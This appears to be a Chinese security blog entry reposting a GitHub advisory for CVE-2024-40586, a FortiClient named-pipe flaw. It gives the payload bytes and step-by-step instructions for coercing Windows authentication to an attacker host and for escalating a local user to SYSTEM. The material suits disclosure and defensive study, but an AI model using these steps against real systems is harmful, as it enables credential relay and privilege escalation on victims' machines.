FortiClient Windows Coerced Authentication Vulnerability

漏洞信息

漏洞名称: FortiClient Windows Coerced Authentication Vulnerability

漏洞编号:

  • CVE: CVE-2024-40586

漏洞类型: 权限提升

漏洞等级: 高危

漏洞描述: FortiClient是Fortinet公司推出的一款多功能安全客户端软件,广泛用于企业环境中,提供VPN、端点保护等功能。该软件在企业级部署中非常常见,用于保障远程办公和数据传输的安全。此次发现的漏洞存在于FortiClient的FortiSSLVPNdaemon服务中,具体表现为一个命名管道(FortiSslvpnNamedPipe)允许任何用户进行读写操作,这导致了Windows系统上的强制认证漏洞。

漏洞的技术根源在于FortiClient在处理通过命名管道接收的数据时,未能正确验证和限制用户权限。具体来说,当操作码为24时,应用程序会读取文件内容,但未对文件路径进行充分验证,攻击者可以利用这一点,通过构造特定的数据包,强制FortiSSLVPNdaemon进程以SYSTEM权限执行文件操作。这包括连接到远程文件或本地命名管道,从而触发强制认证或权限提升。

此漏洞的安全影响极为严重。攻击者可以利用此漏洞进行多种攻击,包括但不限于强制Windows主机向攻击者控制的机器进行认证(Scenario 1),以及从本地用户提升至SYSTEM权限(Scenario 2)。这些攻击不需要攻击者具备高权限,且可以远程执行,极大地增加了企业网络的安全风险。特别是,攻击者可以利用此漏洞进行中继攻击或认证降级攻击,进一步扩大攻击范围和影响。因此,该漏洞被评定为高危漏洞,建议所有使用受影响版本FortiClient的用户尽快更新至安全版本。

产品厂商: Fortinet

产品名称: FortiClient

影响版本: 7.0.8.0427

来源: https://github.com/Hagrid29/CVE-2024-40586-Windows-Coerced-Authentication-in-FortiClient

类型: CVE-2024:github search

仓库文件

  • README.md
  • img
  • poc-forticlient

来源概述

CVE-2024-40586 Windows Coerced Authentication in FortiClient

On Windows system, it was found that FortiClient (App version 7.0.8.0427) allow a remote unprivileged user to coerce Windows hosts authenticate to other machines via a named pipe responsible for FortiSSLVPNdaemon service.

It was observed that the named pipe “FortiSslvpnNamedPipe” allow READ and WRITE from any user.

Fig1

Analysis

The app read the 5th byte of buffer from the named pipe as op code PipeBuffer+4

Fig2

It was observed that the app will read file if the op code is equal to 24 (i.e., 0x18)
Code flow: Case 24 => LABEL_26 => strncpy copy payload to variable Buffer => pass the payload to sub_7FF60C3EAC20 => call CreateFileA => ReadFile
Fig3

Fig4

Fig5

However, the application does not do anything about the file content.

Exploit

We can send a crafted traffic (i.e., “\x00\x00\x00\x00\x18\x00” concatenate with target path) to vulnerable named pipe “FortiSslvpnNamedPipe” to trigger op code 24 and force the process “FortiSSLVPNdaemon.exe” call CreateFileA with SYSTEM privilege. Therefore, we can force the server to connect remote file by submitting UNC path (e.g., “\\<remote ip>\<file path>”) or connect local named pipe (e.g., “\\127.0.0.1\pipe\<named pipe>”)

Scenario 1

To coerce Windows hosts authenticate to other machines with a remote unauthenticated user, the user could follow the step:

  1. On attacker machine, start a listener to receive coerced authentication
  2. On attacker machine, send crafted payload (i.e., “\x00\x00\x00\x00\x18\x00” + “\\<attacker IP>\fake\fake”) to vulnerable named pipe of victim machine “\\<victim IP>\pipe\FortiSslvpnNamedPipe” to force the process connect a remote file with UNC path “\\<attacker IP>\fake\fake”
  3. Similar to other coerce authentication attack (e.g., SpoolSample), attacker could perform relay attack or authentication downgrade attack

Fig6

Scenario 2

To perform privilege escalation to SYSTEM from a local user with “SeImpersonatePrivilege” (e.g., “nt authority\network service”), the user could follow the steps:

  1. Create a named pipe server that wait for connection.
  2. Send crafted payload (i.e., “\x00\x00\x00\x00\x18\x00” + “\\127.0.0.1\pipe\<pipe server>\XXX”) to local vulnerable named pipe “\\.\pipe\FortiSslvpnNamedPipe” to force the process connect to our named pipe server
  3. After the connection come in, call ImpersonateNamedPipeClient() to impersonate SYSTEM privilege.

Fig7

Timeline

  • 07/09/2023 - Vulnerability reported to Fortinet
  • 08/30/2023 - Fortinet confirmed vulnerability
  • 02/11/2024 - Publication

Reference

Github Poc
#权限提升 #CVE-2024:github search
FortiClient Windows Coerced Authentication Vulnerability
http://example.com/2025/07/24/github_3687467491/
作者
lianccc
发布于
2025年7月24日
许可协议